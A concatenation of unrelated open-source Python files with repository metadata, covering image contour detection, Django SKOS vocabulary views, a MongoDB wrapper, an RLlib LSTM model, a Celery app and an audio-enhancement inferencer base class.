    img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    _, threshold = cv2.threshold(img_gray, 245, 255, cv2.THRESH_BINARY_INV)
    contours, _ = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # For each contour approximate the curve and
    # detect the shapes.
    approximations = []
    # NOTE(review): the first contour is skipped — presumably the image
    # border / background contour; confirm with a sample mask.
    for cnt in contours[1::]:
        # epsilon = 0.01*cv2.arcLength(cnt, True)
        # Approximation tolerance is 0.5% of the contour perimeter.
        epsilon = 0.005*cv2.arcLength(cnt, True)
        approx = cv2.approxPolyDP(cnt, epsilon, True)
        approximations.append([a[0] for a in approx.tolist()])
        # print(approx)
        cv2.drawContours(img, [approx], 0, (0, 255, 0), 3)
    with open('extracted_data/' + name + '_holds.json', 'w') as f:
        f.write(json.dumps(dict(holds=approximations)))
    # cv2.imshow("final", img)
    cv2.imwrite(os.path.splitext(image)[0] + '_contours.png', img)
    # cv2.waitKey(0)
    return dict(holds=approximations)
if __name__ == '__main__':
    import argparse

    def _str2bool(value):
        """Parse a CLI boolean explicitly.

        argparse's ``type=bool`` treats ANY non-empty string — including
        "False" — as True, so the documented sample run was always enabling
        combine_results. Map the accepted spellings by hand instead.
        """
        return value.strip().lower() in ('1', 'true', 'yes', 'y', 't')

    parser = argparse.ArgumentParser(description='Hold detection')
    parser.add_argument('images_path', type=str, default='', help='The input wall image file')
    parser.add_argument('model_path', type=str, default='', help='climbnet model weights')
    parser.add_argument('tile_width', type=int, default=0, help='Tile width')
    parser.add_argument('tile_height', type=int, default=0, help='Tile height')
    parser.add_argument('combine_results', type=_str2bool, default=False,
                        help='Mix results of split detection and overall detection')
    args = parser.parse_args()

    # Collect only the top-level file names under the input directory
    # (the immediate `break` skips subdirectories).
    f = []
    for (dirpath, dirnames, filenames) in walk(args.images_path):
        f.extend(filenames)
        break

    main(f, args.model_path, args.tile_width, args.tile_height, args.combine_results)

# sample run:
# > python .\extract_holds.py raw_images ..\model_weights\model_d2_R_50_FPN_3x.pth 0 600 False
cceb19f18e4db1f1bc90595c42aabfc173275b59 | 5,083 | py | Python | vocabs/views.py | acdh-oeaw/vhioe | 83c8bce83d7cb21150f404409477d2cd1c7ee240 | [
"MIT"
] | 1 | 2017-10-17T10:05:44.000Z | 2017-10-17T10:05:44.000Z | vocabs/views.py | acdh-oeaw/cbab | 7cd25f057913dccf85f851e448b1dbc2c5f8d624 | [
"MIT"
] | 15 | 2017-10-17T09:57:10.000Z | 2021-12-13T19:48:46.000Z | vocabs/views.py | acdh-oeaw/thunau | 06e4d54f4553939ffba3c504088055c3807328c6 | [
"MIT"
] | 1 | 2017-11-09T11:18:24.000Z | 2017-11-09T11:18:24.000Z | from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse_lazy
from django_tables2 import SingleTableView, RequestConfig
from .models import SkosConcept, SkosConceptScheme, SkosLabel
from .forms import SkosConceptForm, SkosConceptSchemeForm, SkosLabelForm, GenericFilterFormHelper
from .tables import SkosConceptTable
from .filters import SkosConceptFilter
#####################################################
# ConceptScheme
#####################################################
###################################################
# SkosLabel
###################################################
| 29.725146 | 97 | 0.714539 | from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse_lazy
from django_tables2 import SingleTableView, RequestConfig
from .models import SkosConcept, SkosConceptScheme, SkosLabel
from .forms import SkosConceptForm, SkosConceptSchemeForm, SkosLabelForm, GenericFilterFormHelper
from .tables import SkosConceptTable
from .filters import SkosConceptFilter
class GenericListView(SingleTableView):
    """Filterable, paginated table view.

    Subclasses set ``filter_class`` (a django-filter FilterSet) and
    ``formhelper_class`` (crispy-forms helper bound to the filter form).
    """
    filter_class = None
    formhelper_class = None
    context_filter_name = 'filter'  # template context key for the filter
    paginate_by = 25

    def get_queryset(self, **kwargs):
        """Return the queryset narrowed by the GET-bound filter."""
        qs = super(GenericListView, self).get_queryset()
        self.filter = self.filter_class(self.request.GET, queryset=qs)
        self.filter.form.helper = self.formhelper_class()
        return self.filter.qs

    def get_table(self, **kwargs):
        """Attach request-aware pagination to the django-tables2 table."""
        table = super(GenericListView, self).get_table()
        RequestConfig(self.request, paginate={
            'page': 1, 'per_page': self.paginate_by}).configure(table)
        return table

    def get_context_data(self, **kwargs):
        """Expose the bound filter in the template context."""
        context = super(GenericListView, self).get_context_data()
        context[self.context_filter_name] = self.filter
        return context
class SkosConceptFilterView(GenericListView):
    """Filterable table listing of SkosConcept objects."""
    model = SkosConcept
    table_class = SkosConceptTable
    template_name = 'vocabs/skosconcept_filter.html'
    filter_class = SkosConceptFilter
    formhelper_class = GenericFilterFormHelper
class SkosConceptDetailView(DetailView):
    """Detail page for a single SkosConcept."""
    model = SkosConcept
    template_name = 'vocabs/skosconcept_detail.html'
class SkosConceptListView(ListView):
    """Plain listing of all SkosConcept objects."""
    model = SkosConcept
    template_name = 'vocabs/skosconcept_list.html'
class SkosConceptCreate(CreateView):
    """Create form for a SkosConcept; login required (via dispatch)."""
    model = SkosConcept
    template_name = 'vocabs/skosconcept_create.html'
    form_class = SkosConceptForm

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosConceptCreate, self).dispatch(*args, **kwargs)
class SkosConceptUpdate(UpdateView):
    """Edit form for a SkosConcept; login required (via dispatch)."""
    model = SkosConcept
    form_class = SkosConceptForm
    template_name = 'vocabs/skosconcept_create.html'

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosConceptUpdate, self).dispatch(*args, **kwargs)
class SkosConceptDelete(DeleteView):
    """Confirm-and-delete view for a SkosConcept; login required."""
    model = SkosConcept
    template_name = 'vocabs/confirm_delete.html'
    success_url = reverse_lazy('vocabs:browse_vocabs')

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosConceptDelete, self).dispatch(*args, **kwargs)
#####################################################
# ConceptScheme
#####################################################
class SkosConceptSchemeDetailView(DetailView):
    """Detail page for a concept scheme, including its member concepts."""
    model = SkosConceptScheme
    template_name = 'vocabs/skosconceptscheme_detail.html'

    def get_context_data(self, **kwargs):
        """Add the concepts belonging to this scheme under ``concepts``."""
        context = super(SkosConceptSchemeDetailView, self).get_context_data(**kwargs)
        context["concepts"] = SkosConcept.objects.filter(scheme=self.kwargs.get('pk'))
        return context
class SkosConceptSchemeListView(ListView):
    """Plain listing of all SkosConceptScheme objects."""
    model = SkosConceptScheme
    template_name = 'vocabs/skosconceptscheme_list.html'
class SkosConceptSchemeCreate(CreateView):
    """Create form for a SkosConceptScheme; login required (via dispatch)."""
    model = SkosConceptScheme
    form_class = SkosConceptSchemeForm
    template_name = 'vocabs/skosconceptscheme_create.html'

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosConceptSchemeCreate, self).dispatch(*args, **kwargs)
class SkosConceptSchemeUpdate(UpdateView):
    """Edit form for a SkosConceptScheme; login required (via dispatch)."""
    model = SkosConceptScheme
    form_class = SkosConceptSchemeForm
    template_name = 'vocabs/skosconceptscheme_create.html'

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosConceptSchemeUpdate, self).dispatch(*args, **kwargs)
###################################################
# SkosLabel
###################################################
class SkosLabelDetailView(DetailView):
    """Detail page for a single SkosLabel."""
    model = SkosLabel
    template_name = 'vocabs/skoslabel_detail.html'
class SkosLabelListView(ListView):
    """Plain listing of all SkosLabel objects."""
    model = SkosLabel
    template_name = 'vocabs/skoslabel_list.html'
class SkosLabelCreate(CreateView):
    """Create form for a SkosLabel; login required (via dispatch)."""
    model = SkosLabel
    template_name = 'vocabs/skoslabel_create.html'
    form_class = SkosLabelForm

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosLabelCreate, self).dispatch(*args, **kwargs)
class SkosLabelUpdate(UpdateView):
    """Edit form for a SkosLabel; login required (via dispatch)."""
    model = SkosLabel
    form_class = SkosLabelForm
    template_name = 'vocabs/skoslabel_create.html'

    @method_decorator(login_required)
    def dispatch(self, *args, **kwargs):
        return super(SkosLabelUpdate, self).dispatch(*args, **kwargs)
| 1,423 | 2,428 | 345 |
20800899334a7f9045e3040d9fc79c07a6e2cb14 | 784 | py | Python | api/db/db.py | bcgov/data-stream | 2d8fbf3843ee765ee102f306993fdbc742aca5d8 | [
"Apache-2.0"
] | 1 | 2019-02-10T08:27:22.000Z | 2019-02-10T08:27:22.000Z | api/db/db.py | bcgov/data-stream | 2d8fbf3843ee765ee102f306993fdbc742aca5d8 | [
"Apache-2.0"
] | 18 | 2019-02-09T01:02:09.000Z | 2022-03-30T23:04:24.000Z | api/db/db.py | bcgov/data-stream | 2d8fbf3843ee765ee102f306993fdbc742aca5d8 | [
"Apache-2.0"
] | 2 | 2019-02-09T06:36:54.000Z | 2019-02-12T09:52:58.000Z | from mongoengine import connect
from config import Config
from db.models.subscriptions import Subscriptions
| 34.086957 | 68 | 0.633929 | from mongoengine import connect
from config import Config
from db.models.subscriptions import Subscriptions
class Db:
    """Thin wrapper that opens the mongoengine connection and exposes models."""
    # Class-level default; rebound per instance in __init__.
    Subscriptions = None

    def __init__(self, createClient=True):
        # createClient=False presumably defers actual client creation until
        # first use (mongoengine's ``connect`` kwarg) — useful in tests.
        config = Config()
        self.db = {}
        self.Subscriptions = Subscriptions
        self.createClient = createClient
        self.initConnection(config)

    def initConnection(self, config):
        """Connect mongoengine using credentials from the application config."""
        connect(
            db=config.data['database']['dbName'],
            host=config.data['database']['host'],
            port=config.data['database']['port'],
            username=config.data['database']['username'],
            password=config.data['database']['password'],
            authentication_source=config.data['database']['dbName'],
            connect=self.createClient)
| 587 | 66 | 23 |
06e43597610cd88482cb86a5d3d21ac4ef2589de | 2,779 | py | Python | gym_continuousDoubleAuction/train/model/model_handler.py | FabianSchuetze/gym-continuousDoubleAuction | cc1b5ddff6c32a882d70d2563596bc7eb32dcd9f | [
"MIT"
] | 96 | 2019-08-15T16:36:01.000Z | 2022-03-29T16:46:49.000Z | gym_continuousDoubleAuction/train/model/model_handler.py | sbhadade/gym-continuousDoubleAuction | dbfeb7e1c1751b318c6e8bc570101d6f856720fe | [
"MIT"
] | 10 | 2019-08-27T08:30:20.000Z | 2022-03-11T23:57:41.000Z | gym_continuousDoubleAuction/train/model/model_handler.py | sbhadade/gym-continuousDoubleAuction | dbfeb7e1c1751b318c6e8bc570101d6f856720fe | [
"MIT"
] | 17 | 2020-04-15T14:44:23.000Z | 2022-03-12T20:39:55.000Z | from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.tf.fcnet_v2 import FullyConnectedNetwork
from ray.rllib.models import Model # deprecated and should not be used.
class CustomModel_1(Model):
"""
Sample custom model with LSTM.
Still working but deprecated and should not be used.
Need to update this class.
see: https://ray.readthedocs.io/en/latest/rllib-models.html
"""
"""
def _build_layers_v2(self, input_dict, num_outputs, options):
hidden = 512
cell_size = 256
#S = input_dict["obs"]
S = tf.layers.flatten(input_dict["obs"])
with tf.variable_scope(tf.VariableScope(tf.AUTO_REUSE, "shared"),
reuse=tf.AUTO_REUSE,
auxiliary_name_scope=False):
last_layer = tf.layers.dense(S, hidden, activation=tf.nn.relu, name="fc1")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc2")
last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc3")
last_layer = self._lstm(last_layer, cell_size)
output = tf.layers.dense(last_layer, num_outputs, activation=tf.nn.softmax, name="mu")
return output, last_layer
"""
| 44.822581 | 127 | 0.65923 | from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.tf.fcnet_v2 import FullyConnectedNetwork
from ray.rllib.models import Model # deprecated and should not be used.
class CustomModel_1(Model):
    """
    Sample custom model with LSTM.
    Still working but deprecated and should not be used.
    Need to update this class.
    see: https://ray.readthedocs.io/en/latest/rllib-models.html
    """
    # NOTE(review): ``tf`` is used throughout but no tensorflow import is
    # visible in this module — confirm it is provided elsewhere.
    def _lstm(self, Inputs, cell_size):
        """Run a single-layer LSTM over the batch, treated as one time-major
        sequence, and return the flattened per-step outputs."""
        s = tf.expand_dims(Inputs, axis=1, name='time_major')  # [time_step, feature] => [time_step, batch, feature]
        lstm_cell = tf.nn.rnn_cell.LSTMCell(cell_size)
        self.init_state = lstm_cell.zero_state(batch_size=1, dtype=tf.float32)
        # time_major means [time_step, batch, feature] while batch major means [batch, time_step, feature]
        outputs, self.final_state = tf.nn.dynamic_rnn(cell=lstm_cell, inputs=s, initial_state=self.init_state, time_major=True)
        lstm_out = tf.reshape(outputs, [-1, cell_size], name='flatten_rnn_outputs')  # joined state representation
        return lstm_out

    """
    def _build_layers_v2(self, input_dict, num_outputs, options):
        hidden = 512
        cell_size = 256
        #S = input_dict["obs"]
        S = tf.layers.flatten(input_dict["obs"])
        with tf.variable_scope(tf.VariableScope(tf.AUTO_REUSE, "shared"),
                               reuse=tf.AUTO_REUSE,
                               auxiliary_name_scope=False):
            last_layer = tf.layers.dense(S, hidden, activation=tf.nn.relu, name="fc1")
            last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc2")
            last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc3")
        last_layer = self._lstm(last_layer, cell_size)
        output = tf.layers.dense(last_layer, num_outputs, activation=tf.nn.softmax, name="mu")
        return output, last_layer
    """

    def _build_layers_v2(self, input_dict, num_outputs, options):
        """LSTM over the flattened observation, then three shared dense
        layers and a softmax output head. Returns (output, last_layer)."""
        hidden = 512
        cell_size = 256
        S = input_dict["obs"]
        last_layer = tf.layers.flatten(S)
        last_layer = self._lstm(last_layer, cell_size)
        # The "shared" scope reuses weights across policies/agents.
        with tf.variable_scope(tf.VariableScope(tf.AUTO_REUSE, "shared"),
                               reuse=tf.AUTO_REUSE,
                               auxiliary_name_scope=False):
            last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc1")
            last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc2")
            last_layer = tf.layers.dense(last_layer, hidden, activation=tf.nn.relu, name="fc3")
        output = tf.layers.dense(last_layer, num_outputs, activation=tf.nn.softmax, name="mu")
        return output, last_layer
| 1,451 | 0 | 54 |
ab1da09f99b9d7d70090d275398149f2669bd51b | 621 | py | Python | model_prefix/models.py | anx-abruckner/django-model-prefix | a5cabf1ac210b6358ea358b1d268d802114d85d4 | [
"MIT"
] | null | null | null | model_prefix/models.py | anx-abruckner/django-model-prefix | a5cabf1ac210b6358ea358b1d268d802114d85d4 | [
"MIT"
] | null | null | null | model_prefix/models.py | anx-abruckner/django-model-prefix | a5cabf1ac210b6358ea358b1d268d802114d85d4 | [
"MIT"
] | 1 | 2021-10-08T13:26:44.000Z | 2021-10-08T13:26:44.000Z | from django.conf import settings
from django.db.models import options
from django.db.models.signals import class_prepared, pre_init
options.DEFAULT_NAMES = options.DEFAULT_NAMES + ('db_prefix',)
pre_init.connect(model_prefix)
class_prepared.connect(model_prefix)
| 28.227273 | 63 | 0.752013 | from django.conf import settings
from django.db.models import options
from django.db.models.signals import class_prepared, pre_init
options.DEFAULT_NAMES = options.DEFAULT_NAMES + ('db_prefix',)
def model_prefix(sender, **kwargs):
    """Prepend a prefix to the model's ``db_table`` name.

    A per-model ``Meta.db_prefix`` takes precedence over the global
    ``DB_PREFIX`` setting; the prefix is applied at most once.
    """
    meta = sender._meta
    prefix = getattr(meta, 'db_prefix', getattr(settings, "DB_PREFIX", None))
    if prefix and not meta.db_table.startswith(prefix):
        meta.db_table = prefix + meta.db_table
pre_init.connect(model_prefix)
class_prepared.connect(model_prefix)
| 331 | 0 | 23 |
f52f7f7f2386b190111a72f56968dc3910c24afe | 225 | py | Python | test/tiles/time_interval_test.py | sergpolly/clodius | 16c2dcba52326e8cd0f02d096b735904b3da95f4 | [
"MIT"
] | 14 | 2018-11-14T23:58:32.000Z | 2021-09-12T13:56:19.000Z | test/tiles/time_interval_test.py | sergpolly/clodius | 16c2dcba52326e8cd0f02d096b735904b3da95f4 | [
"MIT"
] | 71 | 2018-10-30T15:31:24.000Z | 2022-03-20T21:10:19.000Z | test/tiles/time_interval_test.py | sergpolly/clodius | 16c2dcba52326e8cd0f02d096b735904b3da95f4 | [
"MIT"
] | 15 | 2018-10-30T15:31:44.000Z | 2021-12-22T02:23:00.000Z | import clodius.tiles.time_interval as hgti
import os.path as op
| 22.5 | 51 | 0.737778 | import clodius.tiles.time_interval as hgti
import os.path as op
def test_tileset_info():
    """Smoke test: tileset_info must not raise on the bundled sample file."""
    sample_path = op.join("data", "sample_htime.json")
    hgti.tileset_info(sample_path)
    # TODO: Make assertions about info returned.
| 137 | 0 | 23 |
12d4d0256da740c2a3582b488dd59b67b7c4e8b1 | 636 | py | Python | qatrack/qa/migrations/0048_auto_20200102_1356.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 20 | 2021-03-11T18:37:32.000Z | 2022-03-23T19:38:07.000Z | qatrack/qa/migrations/0048_auto_20200102_1356.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 75 | 2021-02-12T02:37:33.000Z | 2022-03-29T20:56:16.000Z | qatrack/qa/migrations/0048_auto_20200102_1356.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 5 | 2021-04-07T15:46:53.000Z | 2021-09-18T16:55:00.000Z | # Generated by Django 2.1.11 on 2020-01-02 18:56
from django.db import migrations, models
import qatrack.qatrack_core.fields
| 30.285714 | 256 | 0.690252 | # Generated by Django 2.1.11 on 2020-01-02 18:56
from django.db import migrations, models
import qatrack.qatrack_core.fields
class Migration(migrations.Migration):
    """Add ``TestInstance.json_value``: a nullable JSON column used to store
    the results of upload-file analysis so they can be retrieved without
    reanalyzing the file.

    Auto-generated by Django (see header); avoid editing operations by hand.
    """
    dependencies = [
        ('qa', '0047_fix_serialized_uploads'),
    ]
    operations = [
        migrations.AddField(
            model_name='testinstance',
            name='json_value',
            field=qatrack.qatrack_core.fields.JSONField(blank=True, editable=True, help_text='Currently used to store results of upload file analysis. Allows you to retrieve results of file upload analysis without having to reanalyze the file', null=True),
        ),
    ]
| 0 | 485 | 23 |
d1148f4d27190c9bffce4be88de4cecf1a8da8ad | 219 | py | Python | main.py | CS-Cafe/Rube-Goldberg-Machine | e66643e552ca41a3b51a9d8d22064465300d3bb6 | [
"MIT"
] | 1 | 2021-09-20T01:40:40.000Z | 2021-09-20T01:40:40.000Z | main.py | CS-Cafe/Rube-Goldberg-Machine | e66643e552ca41a3b51a9d8d22064465300d3bb6 | [
"MIT"
] | null | null | null | main.py | CS-Cafe/Rube-Goldberg-Machine | e66643e552ca41a3b51a9d8d22064465300d3bb6 | [
"MIT"
] | null | null | null | from pynput.keyboard import Key, Controller
import time
keyboard = Controller()
try:
while 1:
time.sleep(3)
keyboard.press(Key.alt)
keyboard.press(Key.f4)
except KeyboardInterrupt:
pass
| 18.25 | 43 | 0.675799 | from pynput.keyboard import Key, Controller
import time
# Repeatedly send Alt+F4 (close active window) every 3 seconds until the
# script is interrupted with Ctrl+C.
keyboard = Controller()
try:
    while 1:
        time.sleep(3)
        keyboard.press(Key.alt)
        keyboard.press(Key.f4)
        # BUGFIX: release both keys after pressing them. Without release()
        # the keys stay logically held down, so the Alt+F4 chord cannot be
        # re-triggered on later iterations and the OS is left with a stuck
        # Alt modifier when the script exits.
        keyboard.release(Key.f4)
        keyboard.release(Key.alt)
except KeyboardInterrupt:
    pass
| 0 | 0 | 0 |
5a668792bed1487d85ba503a8538660f4ba65b76 | 356 | py | Python | hysds/celery.py | hysds/hysds | 839d527114e115603ea0a2c4c1b7fe474f7b7b39 | [
"Apache-2.0"
] | 17 | 2018-04-30T17:53:23.000Z | 2021-11-10T18:24:24.000Z | hysds/celery.py | hysds/hysds | 839d527114e115603ea0a2c4c1b7fe474f7b7b39 | [
"Apache-2.0"
] | 54 | 2017-10-17T23:22:53.000Z | 2022-02-09T22:05:07.000Z | hysds/celery.py | hysds/hysds | 839d527114e115603ea0a2c4c1b7fe474f7b7b39 | [
"Apache-2.0"
] | 9 | 2018-01-13T01:07:21.000Z | 2021-02-25T21:21:43.000Z | from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from celery import Celery
app = Celery("hysds")
app.config_from_object("celeryconfig")
if __name__ == "__main__":
app.start()
| 19.777778 | 39 | 0.817416 | from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()  # map Python 2 stdlib names to their Python 3 locations
from celery import Celery
# HySDS Celery application; broker/queue/task settings are loaded from the
# ``celeryconfig`` module found on the Python path.
app = Celery("hysds")
app.config_from_object("celeryconfig")
if __name__ == "__main__":
    # Running this module directly starts the Celery command-line program.
    app.start()
| 0 | 0 | 0 |
821de4baf0a3b8e05bb65e46b824fa407b57833d | 30 | py | Python | tests/instagram/fixtures/endpoints/internal/__init__.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | 13 | 2019-08-07T21:24:34.000Z | 2020-12-12T12:23:50.000Z | tests/instagram/fixtures/endpoints/internal/__init__.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | tests/instagram/fixtures/endpoints/internal/__init__.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null |
from .msisdn_header import *
| 10 | 28 | 0.766667 |
from .msisdn_header import *
| 0 | 0 | 0 |
c747dc952f4cbc13c10e968bff59ff2fd4f23bee | 1,246 | py | Python | backend/viperid/utils.py | vaporycommonwealth/viperid | ef910346a096876b36eacfabd86bb551b58ba1af | [
"MIT"
] | null | null | null | backend/viperid/utils.py | vaporycommonwealth/viperid | ef910346a096876b36eacfabd86bb551b58ba1af | [
"MIT"
] | null | null | null | backend/viperid/utils.py | vaporycommonwealth/viperid | ef910346a096876b36eacfabd86bb551b58ba1af | [
"MIT"
] | 1 | 2017-09-25T13:13:27.000Z | 2017-09-25T13:13:27.000Z | from functools import wraps
from werkzeug.exceptions import BadRequest
from flask import request, jsonify
| 27.688889 | 80 | 0.536116 | from functools import wraps
from werkzeug.exceptions import BadRequest
from flask import request, jsonify
def body_required(f):
    """Decorator: parse the request body as JSON and require a non-empty
    ``code`` field, which is passed to ``f`` as its first positional argument.

    Responds with HTTP 400 and a JSON ``error`` payload when the body is not
    valid JSON or when ``code`` is missing/empty.
    """
    @wraps(f)
    def decorated_function(*args, **kwargs):
        # force=True parses the body as JSON regardless of the Content-Type
        # header, to allow integration easily with any frontend.
        try:
            payload = request.get_json(force=True)
        except BadRequest:
            bad_json = {'message': 'Viperid only accept POST method with data json.'}
            return jsonify(error=bad_json), 400
        source = payload.get('code', '')
        if not source:
            return jsonify(error={'message': 'Code field is empty'}), 400
        return f(source, *args, **kwargs)
    return decorated_function
def get_error(e: Exception):
    """Build a JSON-serializable description of an exception.

    The message is taken, in order of preference, from ``e.msg`` (used by
    Vyper compiler errors), ``e.message``, or the first positional argument.
    Optional source-location attributes (``text``, ``lineno``,
    ``source_code``) are included when present, otherwise defaulted.
    """
    if hasattr(e, 'msg'):
        message = e.msg
    elif hasattr(e, 'message'):
        message = e.message
    elif getattr(e, 'args', None):
        # BUGFIX: every exception has an ``args`` attribute, so the previous
        # ``hasattr(e, 'args')`` check made ``e.args[0]`` raise IndexError
        # for exceptions created with no arguments (e.g. ``Exception()``).
        # Only index args when it is non-empty.
        message = e.args[0]
    else:
        message = ''
    return {
        'message': message,
        'text': e.text if hasattr(e, 'text') else '',
        'line_no': e.lineno if hasattr(e, 'lineno') else '',
        'source_code': e.source_code if hasattr(e, 'source_code') else []
    }
| 1,092 | 0 | 46 |
72d9061cbbb2486c49ca34fb4aa672a7b5f9438e | 7,762 | py | Python | audio_zen/inferencer/base_inferencer.py | ShkarupaDC/FullSubNet | 2aef8b656376a42fbf519e0020636a893b56c4f8 | [
"MIT"
] | 219 | 2020-12-19T02:22:23.000Z | 2022-03-31T13:38:47.000Z | audio_zen/inferencer/base_inferencer.py | ShkarupaDC/FullSubNet | 2aef8b656376a42fbf519e0020636a893b56c4f8 | [
"MIT"
] | 39 | 2021-01-25T06:51:43.000Z | 2022-03-15T22:35:13.000Z | audio_zen/inferencer/base_inferencer.py | ShkarupaDC/FullSubNet | 2aef8b656376a42fbf519e0020636a893b56c4f8 | [
"MIT"
] | 77 | 2020-12-19T13:08:08.000Z | 2022-03-28T06:48:27.000Z | from functools import partial
from pathlib import Path
import librosa
import numpy as np
import soundfile as sf
import toml
import torch
from torch.nn import functional
from torch.utils.data import DataLoader
from tqdm import tqdm
from audio_zen.acoustics.feature import stft, istft
from audio_zen.utils import initialize_module, prepare_device, prepare_empty_dir
if __name__ == '__main__':
ipt = torch.rand(10, 1, 257, 100)
opt = BaseInferencer._unfold_along_time(ipt, 30)
print(opt.shape) | 41.068783 | 128 | 0.643391 | from functools import partial
from pathlib import Path
import librosa
import numpy as np
import soundfile as sf
import toml
import torch
from torch.nn import functional
from torch.utils.data import DataLoader
from tqdm import tqdm
from audio_zen.acoustics.feature import stft, istft
from audio_zen.utils import initialize_module, prepare_device, prepare_empty_dir
class BaseInferencer:
    """Base class for speech-enhancement inference.

    Builds the dataset and model from a parsed TOML config, restores a
    checkpoint, and (via ``__call__``) writes one enhanced wav file — plus a
    copy of the noisy input — per utterance into the output directory.
    """
    def __init__(self, config, checkpoint_path, output_dir):
        """
        Args:
            config: parsed TOML configuration with "dataset", "model",
                "inferencer" and "acoustics" sections.
            checkpoint_path: path of the model checkpoint to restore.
            output_dir: root directory for the enhanced/noisy wav output.
        """
        checkpoint_path = Path(checkpoint_path).expanduser().absolute()
        root_dir = Path(output_dir).expanduser().absolute()
        self.device = prepare_device(torch.cuda.device_count())
        print("Loading inference dataset...")
        self.dataloader = self._load_dataloader(config["dataset"])
        print("Loading model...")
        self.model, epoch = self._load_model(config["model"], checkpoint_path, self.device)
        self.inference_config = config["inferencer"]
        # The enhanced folder is suffixed with the checkpoint epoch, e.g. "enhanced_0042".
        self.enhanced_dir = root_dir / f"enhanced_{str(epoch).zfill(4)}"
        self.noisy_dir = root_dir / f"noisy"
        # self.enhanced_dir = root_dir
        prepare_empty_dir([self.noisy_dir, self.enhanced_dir])
        # Acoustics
        self.acoustic_config = config["acoustics"]
        # Supported STFT
        self.n_fft = self.acoustic_config["n_fft"]
        self.hop_length = self.acoustic_config["hop_length"]
        self.win_length = self.acoustic_config["win_length"]
        self.sr = self.acoustic_config["sr"]
        # See utils_backup.py
        # Pre-bind the STFT parameters so callers only need to pass the signal.
        self.torch_stft = partial(stft, n_fft=self.n_fft, hop_length=self.hop_length, win_length=self.win_length)
        self.torch_istft = partial(istft, n_fft=self.n_fft, hop_length=self.hop_length, win_length=self.win_length)
        self.librosa_stft = partial(librosa.stft, n_fft=self.n_fft, hop_length=self.hop_length, win_length=self.win_length)
        self.librosa_istft = partial(librosa.istft, hop_length=self.hop_length, win_length=self.win_length)
        print("Configurations are as follows: ")
        print(toml.dumps(config))
        # TODO No dump
        # with open((root_dir / f"{time.strftime('%Y-%m-%d %H:%M:%S')}.toml").as_posix(), "w") as handle:
        #     toml.dump(config, handle)
        self.config = config
    @staticmethod
    def _load_dataloader(dataset_config):
        """Instantiate the dataset named in the config and wrap it in a
        single-sample, single-worker DataLoader."""
        dataset = initialize_module(dataset_config["path"], args=dataset_config["args"], initialize=True)
        dataloader = DataLoader(
            dataset=dataset,
            batch_size=1,
            num_workers=0,
        )
        return dataloader
    @staticmethod
    def _unfold(input, pad_mode, n_neighbor):
        """
        Along the frequency axis, to divide the spectrogram into multiple overlapped sub band.
        Args:
            input: [B, C, F, T]
            pad_mode: padding mode passed to ``functional.pad`` for the frequency edges.
            n_neighbor: number of neighboring frequency bins on each side of the center bin.
        Returns:
            [B, N, C, F, T], F is the number of frequency of the sub band unit, e.g., [2, 161, 1, 19, 200]
        """
        assert input.dim() == 4, f"The dim of input is {input.dim()}, which should be 4."
        batch_size, n_channels, n_freqs, n_frames = input.size()
        output = input.reshape(batch_size * n_channels, 1, n_freqs, n_frames)
        sub_band_n_freqs = n_neighbor * 2 + 1
        # Pad the frequency axis so edge bins also get a full neighborhood.
        output = functional.pad(output, [0, 0, n_neighbor, n_neighbor], mode=pad_mode)
        output = functional.unfold(output, (sub_band_n_freqs, n_frames))
        assert output.shape[-1] == n_freqs, f"n_freqs != N (sub_band), {n_freqs} != {output.shape[-1]}"
        # Split the middle dimensions of the unfolded features
        output = output.reshape(batch_size, n_channels, sub_band_n_freqs, n_frames, n_freqs)
        output = output.permute(0, 4, 1, 2, 3).contiguous() # permute is fundamentally different from reshape: the resulting shape is the same, but the elements are rearranged
        return output
    @staticmethod
    def _unfold_along_time(input, context_size):
        """
        Along the time axis, split overlapped chunks from spectrogram.
        Args:
            input: [B, C, F, T]
            context_size: number of preceding frames attached to each frame
                (each chunk has ``context_size + 1`` frames).
        Returns:
            [B, N, C, F_s, T], where F_s is the frequency size of each sub-band unit, e.g. [2, 161, 1, 19, 200]
        """
        assert input.dim() == 4, f"The dims of input is {input.dim()}. It should be four-dim."
        batch_size, num_channels, num_freqs, num_frames = input.size()
